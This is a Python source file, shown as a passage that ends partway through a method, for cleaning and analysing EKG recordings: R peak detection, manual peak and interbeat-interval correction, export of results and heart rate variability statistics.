| avilin66/Pyspark_codes | EUW_CUSTOMER_LOCATION_WEATHER_DATA.py | EUW_CUSTOMER_LOCATION_WEATHER_DATA.py | py | 5,260 | python | en | code | 1 | github-code | 36 |
18248471298 | """
This file contains methods to visualize EKG data, clean EKG data and run EKG analyses.
Classes
-------
EKG
Notes
-----
All R peak detections should be manually inspected with EKG.plotpeaks method and
false detections manually removed with rm_peak method. After rpeak examination,
NaN data can be accounted for by removing false IBIs with rm_ibi method.
"""
import datetime
import matplotlib.dates as mdates
import matplotlib.pyplot as plt
import numpy as np
import os
import pandas as pd
import scipy as sp
import statistics
import biosignalsnotebooks as bsnb
from scipy import interpolate
from numpy import linspace, diff, zeros_like, arange, array
from mne.time_frequency import psd_array_multitaper
from pandas.plotting import register_matplotlib_converters
from scipy.signal import welch
from scipy.stats.distributions import chi2
class EKG:
"""
Run EKG analyses including cleaning and visualizing data.
Attributes
----------
metadata : nested dict
File information and analysis information.
Format {str:{str:val}} with val being str, bool, float, int or pd.Timestamp.
data : pd.DataFrame
Raw data of the EKG signal (mV) and the threshold line (mV) at each sampled time point.
rpeak_artifacts : pd.Series
False R peak detections that have been removed.
rpeaks_added : pd.Series
R peak detections that have been added.
ibi_artifacts : pd.Series
Interbeat interval data that has been removed.
rpeaks : pd.Series
Cleaned R peaks data without removed peaks and with added peaks.
rr : np.ndarray
Time between R peaks (ms).
nn : np.ndarray
Cleaned time between R peaks (ms) without removed interbeat interval data.
rpeaks_df : pd.DataFrame
Raw EKG value (mV) and corresponding interbeat interval leading up to the data point (ms) at each sampled point.
"""
def __init__(self, fname, fpath, polarity='positive', min_dur=True, epoched=True, smooth=False, sm_wn=30, mw_size=90, upshift=3.5,
rms_align='right', detect_peaks=True, pan_tompkins=True):
"""
Initialize raw EKG object.
Parameters
----------
fname : str
Filename.
fpath : str
Path to file.
polarity: str, default 'positive'
polarity of the R-peak deflection. Options: 'positive', 'negative'
min_dur : bool, default True
Only load files that are >= 5 minutes long.
epoched : bool, default True
Whether file was epoched using ioeeg.
smooth : bool, default False
Whether raw signal should be smoothed before peak detections. Set True if raw data has consistent high frequency noise
preventing accurate peak detection.
sm_wn : float, default 30
Size of moving window for rms smoothing preprocessing (milliseconds).
mw_size : float, default 100
Moving window size for R peak detection (milliseconds).
upshift : float, default 3.5
Detection threshold upshift for R peak detection (% of signal).
rms_align: str, default 'right'
whether to align the mean to the right or left side of the moving window [options: 'right', 'left']
rm_artifacts : bool, default False
Apply IBI artifact removal algorithm.
detect_peaks : bool, default True
Option to detect R peaks and calculate interbeat intervals.
pan_tompkins : bool, default True
Option to detect R peaks using automatic pan tompkins detection method
Returns
-------
EKG object. Includes R peak detections and calculated inter-beat intervals if detect_peaks is set to True.
"""
# set metadata
filepath = os.path.join(fpath, fname)
if epoched == False:
in_num, start_date, slpstage, cycle = fname.split('_')[:4]
elif epoched == True:
in_num, start_date, slpstage, cycle, epoch = fname.split('_')[:5]
self.metadata = {'file_info':{'in_num': in_num,
'fname': fname,
'path': filepath,
'rpeak_polarity': polarity,
'start_date': start_date,
'sleep_stage': slpstage,
'cycle': cycle
}
}
if epoched == True:
self.metadata['file_info']['epoch'] = epoch
# load the ekg
self.load_ekg(min_dur)
# flip the polarity if R peaks deflections are negative
if polarity == 'negative':
self.data = self.data*-1
if smooth == True:
self.rms_smooth(sm_wn)
else:
self.metadata['analysis_info']['smooth'] = False
self.metadata['analysis_info']['rms_smooth_wn'] = 'N/A'
# create empty series for false detections removed and missed peaks added
self.rpeak_artifacts = pd.Series()
self.rpeaks_added = pd.Series()
self.ibi_artifacts = pd.Series()
# detect R peaks
if detect_peaks == True:
if pan_tompkins == True:
self.metadata['analysis_info']['mw_size'] = 'N/A'
self.metadata['analysis_info']['upshift'] = 'N/A'
self.metadata['analysis_info']['rms_align'] = 'N/A'
self.pan_tompkins_detector()
# detect R peaks & calculate inter-beat intevals
else:
self.calc_RR(smooth, mw_size, upshift, rms_align)
self.metadata['analysis_info']['pan_tompkins'] = False
# initialize the nn object
self.nn = self.rr
register_matplotlib_converters()
def load_ekg(self, min_dur):
"""
Load EKG data from csv file and extract metadata including sampling frequency, cycle length, start time and NaN data.
Parameters
----------
min_dur : bool, default True
If set to True, will not load files shorter than the minimum duration length of 5 minutes.
"""
data = pd.read_csv(self.metadata['file_info']['path'], header = [0, 1], index_col = 0, parse_dates=True)['EKG']
# Check cycle length against 5 minute duration minimum
cycle_len_secs = (data.index[-1] - data.index[0]).total_seconds()
if cycle_len_secs < 60*5-1:
if min_dur == True:
print('Data is shorter than minimum duration. Cycle will not be loaded.')
print('--> To load data, set min_dur to False')
return
else:
print('* WARNING: Data is shorter than 5 minutes.')
self.data = data
else:
self.data = data
diff = data.index.to_series().diff()[1:2]
s_freq = 1000000/diff[0].microseconds
nans = len(data) - data['Raw'].count()
# Set metadata
self.metadata['file_info']['start_time'] = data.index[0]
self.metadata['analysis_info'] = {'s_freq': s_freq, 'cycle_len_secs': cycle_len_secs,
'NaNs(samples)': nans, 'NaNs(secs)': nans/s_freq}
print('EKG successfully imported.')
def rms_smooth(self, sm_wn):
"""
Smooth raw data with root mean square (RMS) moving window.
Reduce noise leading to false R peak detections.
Parameters
----------
sm_wn : float, default 30
Size of moving window for RMS smoothing preprocessing (ms).
"""
self.metadata['analysis_info']['smooth'] = True
self.metadata['analysis_info']['rms_smooth_wn'] = sm_wn
mw = int((sm_wn/1000)*self.metadata['analysis_info']['s_freq'])
self.data['raw_smooth'] = self.data.Raw.rolling(mw, center=True).mean()
def set_Rthres(self, smooth, mw_size, upshift, rms_align):
"""
Set R peak detection threshold based on moving average shifted up by a percentage of the EKG signal.
Parameters
----------
smooth : bool, default False
If set to True, raw EKG data will be smoothed using RMS smoothing window.
mw_size : float, default 100
Time over which the moving average of the EKG signal will be taken to calculate the R peak detection threshold (ms).
upshift : float, default 3.5
Percentage of EKG signal that the moving average will be shifted up by to set the R peak detection threshold.
rms_align: str, default 'right'
whether to align the mean to the right or left side of the moving window [options: 'right', 'left']
See Also
--------
EKG.rms_smooth : Smooth raw EKG data with root mean square (RMS) moving window.
"""
print('Calculating moving average with {} ms window and a {}% upshift...'.format(mw_size, upshift))
# convert moving window to sample & calc moving average over window
mw = int((mw_size/1000)*self.metadata['analysis_info']['s_freq'])
#if smooth is true have the moving average calculated based off of smoothed data
if smooth == False:
mavg = self.data.Raw.rolling(mw).mean()
ekg_avg = np.mean(self.data['Raw'])
elif smooth == True:
mavg = self.data.raw_smooth.rolling(mw).mean()
ekg_avg = np.mean(self.data['raw_smooth'])
if rms_align == 'left':
# get the number of NaNs and shift the average left by that amount
mavg = mavg.shift(-mavg.isna().sum())
# replace edge nans with overall average
mavg = mavg.fillna(ekg_avg)
# set detection threshold as +upshift% of moving average
upshift_perc = upshift/100
det_thres = mavg + np.abs(mavg*upshift_perc)
# insert threshold column at consistent position in df to ensure same color for plotting regardless of smoothing
self.data.insert(1, 'EKG_thres', det_thres) # can remove this for speed, just keep as series
#set metadata
self.metadata['analysis_info']['mw_size'] = mw_size
self.metadata['analysis_info']['upshift'] = upshift
self.metadata['analysis_info']['rms_align'] = rms_align
def detect_Rpeaks(self, smooth):
"""
Detect R peaks of raw or smoothed EKG signal based on detection threshold.
Parameters
----------
smooth : bool, default False
If set to True, raw EKG data is smoothed using a RMS smoothing window.
See Also
--------
EKG.rms_smooth : Smooth raw EKG data with root mean square (RMS) moving window
EKG.set_Rthres : Set R peak detection threshold based on moving average shifted up by a percentage of the EKG signal.
"""
print('Detecting R peaks...')
#Use the raw data or smoothed data depending on bool smooth
if smooth == False:
raw = pd.Series(self.data['Raw'])
elif smooth == True:
raw = pd.Series(self.data['raw_smooth'])
thres = pd.Series(self.data['EKG_thres'])
#create empty peaks list
peaks = []
x = 0
#Within the length of the data if the value of raw data (could be smoothed raw data) is less than ekg threshold keep counting forwards
while x < len(raw):
if raw[x] > thres[x]:
roi_start = x
# count forwards to find down-crossing
for h in range(x, len(raw), 1):
# if value drops below threshold, end ROI
if raw[h] < thres[h]:
roi_end = h
break
# else if data ends before dropping below threshold, leave ROI open
# & advance h pointer to end loop
elif (raw[h] >= thres[h]) and (h == len(raw)-1):
roi_end = None
h += 1
break
# if ROI is closed, get maximum between roi_start and roi_end
if roi_end:
peak = raw[x:h].idxmax()
peaks.append(peak)
# advance the pointer
x = h
else:
x += 1
self.rpeaks = raw[peaks]
print('R peak detection complete')
# get time between peaks and convert to mseconds
self.rr = np.diff(self.rpeaks.index)/np.timedelta64(1, 'ms')
# create rpeaks dataframe and add ibi columm
rpeaks_df = pd.DataFrame(self.rpeaks)
ibi = np.insert(self.rr, 0, np.NaN)
rpeaks_df['ibi_ms'] = ibi
self.rpeaks_df = rpeaks_df
print('R-R intervals calculated')
def rm_peak(self, time):
"""
Examine a second of interest and manually remove artifact R peaks.
Parameters
----------
time: str {'hh:mm:ss'}
Time in the format specified dictating the second containing the peak of interest.
Modifies
-------
self.rpeaks : Peaks that have been removed are removed from attribute.
self.rpeaks_df : Peaks that have been removed are removed from attribute.
self.rpeak_artifacts : Removed peaks added to attribute.
"""
# print all rpeaks in the second of interest
peak_idxlist = {}
peak_num = 1
h, m, s = time.split(':')
print('id', '\t', 'time', '\t\t\t\t', 'ibi_ms')
for i, x in enumerate(self.rpeaks_df.index):
if x.hour == int(h) and x.minute == int(m) and x.second == int(s):
peak_idxlist[peak_num] = x
print(peak_num, '\t', x, '\t', self.rpeaks_df['ibi_ms'].loc[x])
peak_num += 1
# specify the peak to remove
rm_peak = input('Rpeaks to remove [list ids or None]: ')
print('\n')
if rm_peak == 'None':
print('No peaks removed.')
return
else:
rm_peaks = rm_peak.split(',')
rm_peaks = [int(x) for x in rm_peaks]
for p in rm_peaks:
peak_to_rm = pd.Series(self.rpeaks[peak_idxlist[p]])
peak_to_rm.index = [peak_idxlist[p]]
# add peak to rpeak_artifacts list
self.rpeak_artifacts = self.rpeak_artifacts.append(peak_to_rm)
self.rpeak_artifacts.sort_index(inplace=True)
# remove peak from rpeaks list & rpeaks dataframe
self.rpeaks.drop(peak_idxlist[p], inplace=True)
self.rpeaks_df.drop(peak_idxlist[p], inplace=True)
print('R peak at ', peak_to_rm.index[0], ' successfully removed.')
# recalculate ibi values
self.rr = np.diff(self.rpeaks.index)/np.timedelta64(1, 'ms')
ibi = np.insert(self.rr, 0, np.NaN)
self.rpeaks_df['ibi_ms'] = ibi
print('ibi values recalculated.')
# refresh nn values
self.nn = self.rr
def undo_rm_peak(self, time):
"""
Manually add back incorrectly removed peaks from EKG.rm_peak method.
Parameters
----------
time : str {'hh:mm:ss'}
Second of incorrectly removed R peak.
Notes
-----
This is strictly an "undo" method. It is NOT equivalent to add_peaks().
Modifies
-------
self.rpeaks : Incorrectly removed R peaks added back.
self.rpeaks_df : Incorrectly removed R peaks added back.
self.rr : IBI values recalculated to reflect change in R peaks.
self.nn : IBI values recalculated to reflect change in R peaks.
self.rpeaks_artifacts : Incorrectly removed R peaks removed from attribute.
See Also
--------
EKG.rm_peak : Examine a second of interest and manually remove artifact R peaks.
EKG.add_peak : Examine a second of interest and manually add missed R peaks.
EKG.undo_add_peak : Manually remove incorrectly added peaks from EKG.add_peak method.
"""
if len(self.rpeak_artifacts) == 0:
print('No rpeaks have been removed.')
return
# print all rpeaks in the second of interest
peak_idxlist = {}
peak_num = 1
h, m, s = time.split(':')
print('id', '\t', 'time')
for i, x in enumerate(self.rpeak_artifacts.index):
if x.hour == int(h) and x.minute == int(m) and x.second == int(s):
peak_idxlist[peak_num] = x
print(peak_num, '\t', x)
peak_num += 1
# specify the peak to add back
add_peak = input('Removed Rpeaks to add back [list ids or None]: ')
print('\n')
if add_peak == 'None':
print('No peaks added.')
return
else:
add_peaks = add_peak.split(',')
add_peaks = [int(x) for x in add_peaks]
for p in add_peaks:
peak_to_add = pd.Series(self.rpeak_artifacts[peak_idxlist[p]])
peak_to_add.index = [peak_idxlist[p]]
# remove peak from rpeak_artifacts list
self.rpeak_artifacts.drop(labels=peak_to_add.index, inplace=True)
# add peak back to rpeaks list
self.rpeaks = self.rpeaks.append(peak_to_add)
self.rpeaks.sort_index(inplace=True)
# add peak back to rpeaks_df
self.rpeaks_df.loc[peak_to_add.index[0]] = [peak_to_add[0], np.NaN]
self.rpeaks_df.sort_index(inplace=True)
print('Rpeak at ', peak_to_add.index[0], ' successfully replaced.')
# recalculate ibi values
self.rr = np.diff(self.rpeaks.index)/np.timedelta64(1, 'ms')
ibi = np.insert(self.rr, 0, np.NaN)
self.rpeaks_df['ibi_ms'] = ibi
print('ibi values recalculated.')
# refresh nn values
self.nn = self.rr
def add_peak(self, time):
"""
Examine a second of interest and manually add missed R peaks.
Parameters
----------
time : str {'hh:mm:ss'}
Second within which peak is to be added.
Modifies
-------
self.rpeaks : Added peaks added to attribute.
self.rpeaks_df : Added peaks added to attribute.
self.rr : IBI values recalculate to reflect changed R peaks.
self.nn : IBI values recalculate to reflect changed R peaks.
self.rpeaks_added : Added peaks stored.
See Also
--------
EKG.undo_add_peak : Manually add back incorrectly added R peaks from EKG.add_peak method.
EKG.rm_peak : Examine a second of interest and manually remove artifact R peak.
EKG.undo_rm_peak : Manually add back incorrectly removed R peaks from EKG.rm_peak method.
"""
# specify time range of missed peak
h, m, s = time.split(':')
us_rng = input('Millisecond range of missed peak [min:max]: ').split(':')
# add zeros bc datetime microsecond precision goes to 6 figures
us_min, us_max = us_rng[0] + '000', us_rng[1] + '000'
# set region of interest for new peak
## can modify this to include smoothing if needed
roi = []
for x in self.data.index:
if x.hour == int(h) and x.minute == int(m) and x.second == int(s) and x.microsecond >= int(us_min) and x.microsecond <= int(us_max):
roi.append(x)
# define new rpeak
if self.metadata['analysis_info']['smooth'] == False:
peak_idx = self.data.loc[roi]['Raw'].idxmax()
peak_val = self.data['Raw'].loc[peak_idx]
new_peak = pd.Series(peak_val, [peak_idx])
if self.metadata['analysis_info']['smooth'] == True:
peak_idx = self.data.loc[roi]['raw_smooth'].idxmax()
peak_val = self.data['raw_smooth'].loc[peak_idx]
new_peak = pd.Series(peak_val, [peak_idx])
# add peak to rpeaks list
self.rpeaks = self.rpeaks.append(new_peak)
self.rpeaks.sort_index(inplace=True)
# add peak to rpeaks_df
self.rpeaks_df.loc[peak_idx] = [peak_val, np.NaN]
self.rpeaks_df.sort_index(inplace=True)
# add peak to rpeaks_added list
self.rpeaks_added = self.rpeaks_added.append(new_peak)
self.rpeaks_added.sort_index(inplace=True)
print('New peak added.')
# recalculate ibi values
self.rr = np.diff(self.rpeaks.index)/np.timedelta64(1, 'ms')
ibi = np.insert(self.rr, 0, np.NaN)
self.rpeaks_df['ibi_ms'] = ibi
print('ibi values recalculated.')
# refresh nn values
self.nn = self.rr
def undo_add_peak(self, time):
"""
Manually remove incorrectly added peaks from EKG.add_peak method.
Parameters
----------
time : str {'hh:mm:ss'}
Second of incorrectly removed R peak.
Modifies
-------
self.rpeaks : Incorrectly added R peaks removed.
self.rpeaks_df : Incorrectly added R peaks removed.
self.rr : IBI values recalculated to reflect change in R peaks.
self.nn : IBI values recalculated to reflect change in R peaks.
self.rpeaks_added : Incorrectly added R peaks removed from attribute.
Notes
-----
This is strictly an "undo" method. It is NOT equivalent to EKG.rm_peak.
See Also
--------
EKG.add_peak : Examine a second of interest and manually add missed R peaks.
EKG.rm_peak : Examine a second of interest and manually remove artifact R peaks.
EKG.undo_rm_peak : Manually add back incorrectly removed peaks from EKG.rm_peak method.
"""
if len(self.rpeaks_added) == 0:
print('No rpeaks have been added.')
return
# print all rpeaks in the second of interest
peak_idxlist = {}
peak_num = 1
h, m, s = time.split(':')
print('id', '\t', 'time')
for i, x in enumerate(self.rpeaks_added.index):
if x.hour == int(h) and x.minute == int(m) and x.second == int(s):
peak_idxlist[peak_num] = x
print(peak_num, '\t', x)
peak_num += 1
# specify the peak to remove
rm_peak = input('Added Rpeaks to remove [list ids or None]: ')
print('\n')
if rm_peak == 'None':
print('No peaks removed.')
return
else:
rm_peaks = rm_peak.split(',')
rm_peaks = [int(x) for x in rm_peaks]
for p in rm_peaks:
peak_to_rm = pd.Series(self.rpeaks_added[peak_idxlist[p]])
peak_to_rm.index = [peak_idxlist[p]]
# remove peak from rpeaks_added list
self.rpeaks_added.drop(labels=peak_to_rm.index, inplace=True)
# remove peak from rpeaks list & rpeaks dataframe
self.rpeaks.drop(peak_idxlist[p], inplace=True)
self.rpeaks_df.drop(peak_idxlist[p], inplace=True)
print('R peak at ', peak_to_rm.index, ' successfully removed.')
# recalculate ibi values
self.rr = np.diff(self.rpeaks.index)/np.timedelta64(1, 'ms')
ibi = np.insert(self.rr, 0, np.NaN)
self.rpeaks_df['ibi_ms'] = ibi
print('ibi values recalculated.')
# refresh nn values
self.nn = self.rr
def rm_ibi(self, thres = 3000):
"""
Manually remove IBI's that can't be manually added with EKG.add_peak() method.
IBIs to be removed could correspond to missing data (due to cleaning) or missed beats.
Parameters
----------
thres: int, default 3000
Threshold time for automatic IBI removal (ms).
Notes
-----
This step must be completed LAST, after removing any false peaks and adding any missed peaks.
See Also
--------
EKG.add_peak : Manually add missed R peaks.
"""
# check for extra-long IBIs & option to auto-remove
if any(self.rpeaks_df['ibi_ms'] > thres):
print(f'IBIs greater than {thres} milliseconds detected')
rm = input('Automatically remove? [y/n]: ')
if rm.casefold() == 'y':
# get indices of ibis greater than threshold
rm_idx = [i for i, x in enumerate(self.nn) if x > thres]
# replace ibis w/ NaN
self.nn[rm_idx] = np.NaN
print('{} IBIs removed.'.format(len(rm_idx), thres))
# add ibi to ibi_artifacts list
df_idx = [x+1 for x in rm_idx] # shift indices by 1 to correspond with df indices
ibis_rmvd = pd.Series(self.rpeaks_df['ibi_ms'].iloc[df_idx])
self.ibi_artifacts = self.ibi_artifacts.append(ibis_rmvd)
self.ibi_artifacts.sort_index(inplace=True)
print('ibi_artifacts series updated.')
# update rpeaks_df
ibi = np.insert(self.nn, 0, np.NaN)
self.rpeaks_df['ibi_ms'] = ibi
print('R peaks dataframe updated.\n')
else:
print(f'All ibis are less than {thres} milliseconds.')
# option to specify which IBIs to remove
rm = input('Manually remove IBIs? [y/n]: ')
if rm.casefold() == 'n':
print('Done.')
return
elif rm.casefold() == 'y':
# print IBI list w/ IDs
print('Printing IBI list...\n')
print('ID', '\t', 'ibi end time', '\t', 'ibi_ms')
for i, x in enumerate(self.rpeaks_df.index[1:]):
print(i, '\t',str(x)[11:-3], '\t', self.rpeaks_df['ibi_ms'].loc[x])
rm_ids = input('IDs to remove [list or None]: ')
if rm_ids.casefold() == 'none':
print('No ibis removed.')
return
else:
# replace IBIs in nn array
rm_ids = [int(x) for x in rm_ids.split(',')]
self.nn[rm_ids] = np.NaN
print('{} IBIs removed.'.format(len(rm_ids)))
# add ibi to ibi_artifacts list
df_idx = [x+1 for x in rm_ids] # shift indices by 1 to correspond with df indices
ibis_rmvd = pd.Series(self.rpeaks_df['ibi_ms'].iloc[df_idx])
self.ibi_artifacts = self.ibi_artifacts.append(ibis_rmvd)
self.ibi_artifacts.sort_index(inplace=True)
print('ibi_artifacts series updated.')
# update self.rpeaks_df
ibi = np.insert(self.nn, 0, np.NaN)
self.rpeaks_df['ibi_ms'] = ibi
print('R peaks dataframe updated.\nDone.')
def calc_RR(self, smooth, mw_size, upshift, rms_align):
"""
Set R peak detection threshold, detect R peaks and calculate R-R intervals.
Parameters
----------
smooth : bool, default True
If set to True, raw EKG data will be smoothed using RMS smoothing window.
mw_size : float, default 100
Time over which the moving average of the EKG signal will be taken to calculate the R peak detection threshold (ms).
upshift : float, default 3.5
Percentage of EKG signal that the moving average will be shifted up by to set the R peak detection threshold.
rms_align: str, default 'right'
Whether to align the mean to the right or left side of the moving window [options: 'right', 'left']
See Also
--------
EKG.set_Rthres : Set R peak detection threshold based on moving average shifted up by a percentage of the EKG signal.
EKG.detect_Rpeaks : Detect R peaks of raw or smoothed EKG signal based on detection threshold.
EKG.pan_tompkins_detector : Use the Pan Tompkins algorithm to detect R peaks and calculate R-R intervals.
"""
# set R peak detection parameters
self.set_Rthres(smooth, mw_size, upshift, rms_align)
# detect R peaks & make RR tachogram
self.detect_Rpeaks(smooth)
def pan_tompkins_detector(self):
"""
Use the Pan Tompkins algorithm to detect R peaks and calculate R-R intervals.
Jiapu Pan and Willis J. Tompkins.
A Real-Time QRS Detection Algorithm.
In: IEEE Transactions on Biomedical Engineering
BME-32.3 (1985), pp. 230–236.
See Also
----------
EKG.calc_RR : Set R peak detection threshold, detect R peaks and calculate R-R intervals.
"""
self.metadata['analysis_info']['pan_tompkins'] = True
#interpolate data because has NaNs, cant for ecg band pass filter step
data = self.data.interpolate()
#makes our data a list because that is the format that bsnb wants it in
signal = pd.Series.tolist(data['Raw'])
# get sample rate
# must be an int
sr = int(self.metadata['analysis_info']['s_freq'])
filtered_signal = bsnb.detect._ecg_band_pass_filter(signal, sr) #Step 1 of Pan-Tompkins Algorithm - ECG Filtering (Bandpass between 5 and 15 Hz)
differentiated_signal = diff(filtered_signal)
squared_signal = differentiated_signal * differentiated_signal
nbr_sampls_int_wind = int(0.080 * sr)
# Initialisation of the variable that will contain the integrated signal samples
integrated_signal = zeros_like(squared_signal)
cumulative_sum = squared_signal.cumsum()
integrated_signal[nbr_sampls_int_wind:] = (cumulative_sum[nbr_sampls_int_wind:] - cumulative_sum[:-nbr_sampls_int_wind]) / nbr_sampls_int_wind
integrated_signal[:nbr_sampls_int_wind] = cumulative_sum[:nbr_sampls_int_wind] / arange(1, nbr_sampls_int_wind + 1)
#R peak detection algorithm
rr_buffer, signal_peak_1, noise_peak_1, threshold = bsnb.detect._buffer_ini(integrated_signal, sr)
probable_peaks, possible_peaks= bsnb.detect._detects_peaks(integrated_signal, sr)
#Identification of definitive R peaks
definitive_peaks = bsnb.detect._checkup(probable_peaks, integrated_signal, sr, rr_buffer, signal_peak_1, noise_peak_1, threshold)
# Conversion to integer type.
definitive_peaks = array(list(map(int, definitive_peaks)))
#Correcting step
#Due to the multiple pre-processing stages there is a small lag in the determined peak positions, which needs to be corrected !
definitive_peaks_rephase = np.array(definitive_peaks) - 30 * (sr / 1000)
definitive_peaks_rephase = list(map(int, definitive_peaks_rephase))
#make peaks list
index = data.index[definitive_peaks_rephase]
values = np.array(signal)[definitive_peaks_rephase]
self.rpeaks = pd.Series(values, index = index)
print('R peak detection complete')
# get time between peaks and convert to mseconds
self.rr = np.diff(self.rpeaks.index)/np.timedelta64(1, 'ms')
# create rpeaks dataframe and add ibi columm
rpeaks_df = pd.DataFrame(self.rpeaks)
ibi = np.insert(self.rr, 0, np.NaN)
rpeaks_df['ibi_ms'] = ibi
self.rpeaks_df = rpeaks_df
print('R-R intervals calculated')
def export_RR(self, savedir):
"""
Export R peaks and RR interval data to .txt files.
Includes list of R peaks artifacts, R peaks added, R peaks detected, IBI artifacts, RR intervals and NN intervals.
Parameters
----------
savedir : str
Path to directory where .txt files will be saved.
See Also
--------
EKG.calc_RR : Set R peak detection threshold, detect R peaks and calculate R-R intervals.
EKG.rm_ibi : Manually remove IBI's that can't be manually added with EKG.add_peak() method.
EKG.add_peak : Manually add missed R peak.
EKG.rm_peak : Examine a second of interest and manually remove artifact R peaks.
"""
# set save directory
if savedir is None:
savedir = os.getcwd()
chngdir = input('Files will be saved to ' + savedir + '. Change save directory? [Y/N] ')
if chngdir == 'Y':
savedir = input('New save directory: ')
if not os.path.exists(savedir):
createdir = input(savedir + ' does not exist. Create directory? [Y/N] ')
if createdir == 'Y':
os.makedirs(savedir)
else:
savedir = input('Try again. Save directory: ')
if not os.path.exists(savedir):
print(savedir + ' does not exist. Aborting. ')
return
elif not os.path.exists(savedir):
print(savedir + ' does not exist. Creating directory...')
os.makedirs(savedir)
else:
print('Files will be saved to ' + savedir)
# save rpeak_artifacts list
try:
self.rpeak_artifacts
except AttributeError:
cont = input('EKG object has no artifacts attribute. Continue save without cleaning? [y/n]: ')
if cont == 'y':
pass
elif cont == 'n':
print('Save aborted.')
return
else:
savearts = self.metadata['file_info']['fname'].split('.')[0] + '_rpeak_artifacts.txt'
art_file = os.path.join(savedir, savearts)
self.rpeak_artifacts.to_csv(art_file, header=False)
print('R peak artifacts exported.')
# save rpeaks_added list
savename = self.metadata['file_info']['fname'].split('.')[0] + '_rpeaks_added.txt'
savefile = os.path.join(savedir, savename)
self.rpeaks_added.to_csv(savefile, header=False)
print('R peak additions exported.')
# save R peak detections
savepeaks = self.metadata['file_info']['fname'].split('.')[0] + '_rpeaks.txt'
peaks_file = os.path.join(savedir, savepeaks)
self.rpeaks.to_csv(peaks_file, header=False)
print('R peaks exported.')
# save ibi_artifact list
savename = self.metadata['file_info']['fname'].split('.')[0] + '_ibi_artifacts.txt'
savefile = os.path.join(savedir, savename)
self.ibi_artifacts.to_csv(savefile, header=False)
print('IBI artifacts exported.')
# save RR intervals
if self.metadata['analysis_info']['pan_tompkins'] == False:
rr_header = 'R peak detection mw_size = {} & upshift = {}'.format(self.metadata['analysis_info']['mw_size'], self.metadata['analysis_info']['upshift'])
else:
rr_header = 'R peak detection using the Pan Tompkins algorithm'
saverr = self.metadata['file_info']['fname'].split('.')[0] + '_rr.txt'
rr_file = os.path.join(savedir, saverr)
np.savetxt(rr_file, self.rr, header=rr_header, fmt='%.0f', delimiter='\n')
print('rr intervals exported.')
# save NN intervals, if exists
try:
self.nn
except AttributeError:
print('EKG object has no nn attribute. Only exporting r peaks and rr intervals.')
pass
else:
# set # of artifacts removed for header
try:
self.rpeak_artifacts
except AttributeError:
arts_len = 0
else:
arts_len = len(self.rpeak_artifacts) + len(self.ibi_artifacts)
if self.metadata['analysis_info']['pan_tompkins'] == False:
nn_header = 'R peak detection mw_size = {} & upshift = {}.\nTotal artifacts removed = {} ( {} false peaks + {} false ibis).'.format(self.metadata['analysis_info']['mw_size'], self.metadata['analysis_info']['upshift'], arts_len, len(self.rpeak_artifacts), len(self.ibi_artifacts))
else:
nn_header = 'R peak detection using the Pan Tompkins algorithm.\nTotal artifacts removed = {} ( {} false peaks + {} false ibis).'.format(arts_len, len(self.rpeak_artifacts), len(self.ibi_artifacts))
savenn = self.metadata['file_info']['fname'].split('.')[0] + '_nn.txt'
nn_file = os.path.join(savedir, savenn)
np.savetxt(nn_file, self.nn, header=nn_header, fmt='%.0f', delimiter='\n')
print('nn intervals exported.')
print('Done.')
def calc_tstats(self, itype):
"""
Calculate commonly used time domain HRV statistics.
Time domain HRV statistics include mean, min and max HR (bpm), mean interbeat interval length, SDNN, RMSSD, pNN20 and pNN50.
SDNN is the standard deviation of normal to normal IBI. RMSSD is the root mean squared standard deviation of normal interbeat interval length.
pNN20 and pNN50 are the percentage of normal interbeat intervals that exceed 20ms and 50ms respectively.
Min and max HR is determined over 5 RR intervals.
Parameters
----------
itype : str {'rr, 'nn'}
Interval type.'rr' is uncleaned data. 'nn' is normal intervals (cleaned).
See Also
--------
EKG.hrv_stats : Calculate all HRV statistics on IBI object.
EKG.calc_fstats : Calculate frequency domain statistics.
EKG.calc_psd_welch : Calculate welch power spectrum.
EKG.calc_psd_mt : Calculate multitaper power spectrum.
EKG.calc_fbands : Calculate different frequency band measures.
"""
print('Calculating time domain statistics...')
if itype == 'rr':
ii = self.rr
ii_diff = np.diff(self.rr)
ii_diffsq = ii_diff**2
self.rr_diff = ii_diff
self.rr_diffsq = ii_diffsq
elif itype == 'nn':
# remove np.NaNs for calculations
ii = self.nn[~np.isnan(self.nn)]
ii_diff = np.diff(ii)
ii_diffsq = ii_diff**2
self.nn_diff = ii_diff
self.nn_diffsq = ii_diffsq
# heartrate in bpm
hr_avg = 60/np.mean(ii)*1000
rollmean_ii = pd.Series(ii).rolling(5).mean()
mx_ii, mn_ii = np.nanmax(rollmean_ii), np.nanmin(rollmean_ii)
hr_max = 60/mn_ii*1000
hr_min = 60/mx_ii*1000
# inter-beat interval & SD (ms)
ibi = np.mean(ii)
sdnn = np.std(ii, ddof=1)
# SD & RMS of differences between successive II intervals (ms)
sdsd = np.std(ii_diff)
rmssd = np.sqrt(np.mean(ii_diffsq))
# pNN20 & pNN50
pxx20 = sum(np.abs(ii_diff) >= 20.0)/(len(ii_diff)-1) *100
pxx50 = sum(np.abs(ii_diff) >= 50.0)/(len(ii_diff)-1) *100
self.time_stats = {'linear':{'HR_avg': hr_avg, 'HR_max': hr_max, 'HR_min': hr_min, 'IBI_mean': ibi,
'SDNN': sdnn, 'RMSSD': rmssd, 'pXX20': pxx20, 'pXX50': pxx50},
}
print('Time domain stats stored in obj.time_stats\n')
def interpolate_IBI(self, itype):
"""
Resample tachogram to original sampling frequency and interpolate for power spectral estimation.
This is done since RRs are not evenly placed.
Parameters
----------
itype : str {'rr', 'nn'}
Interval type.'rr' is uncleaned data. 'nn' is normal intervals (cleaned).
Note
----
Adapted from pyHRV
See Also
--------
EKG.calc_psd_welch : Calculate welch power spectrum.
EKG.calc_psd_mt : Calculate multitaper power spectrum.
"""
# specify data
if itype == 'rr':
ii = self.rr
elif itype == 'nn':
# remove np.NaNs for calculations
ii = self.nn[~np.isnan(self.nn)]
# interpolate
fs = self.metadata['analysis_info']['s_freq']
t = np.cumsum(ii)
t -= t[0]
f_interp = sp.interpolate.interp1d(t, ii, 'cubic')
t_interp = np.arange(t[0], t[-1], 1000./fs)
self.ii_interp = f_interp(t_interp)
self.metadata['analysis_info']['s_freq_interp'] = self.metadata['analysis_info']['s_freq']
def data_pre_processing(self,fs):
"""
Load data to the workspace and perform pre-processing: Linearly interpolate the NN time series and zero center.
Parameters
----------
fs : int
desired sampling frequency of time series in Hz
Returns
-------
NN_intervals_interpolated : np.ndarray
Interpolated and zero centered NN time series
K : int
Length of NN_intervals_interpolated
"""
# remove the time intervals that are not valid
NN_intervals = self.nn
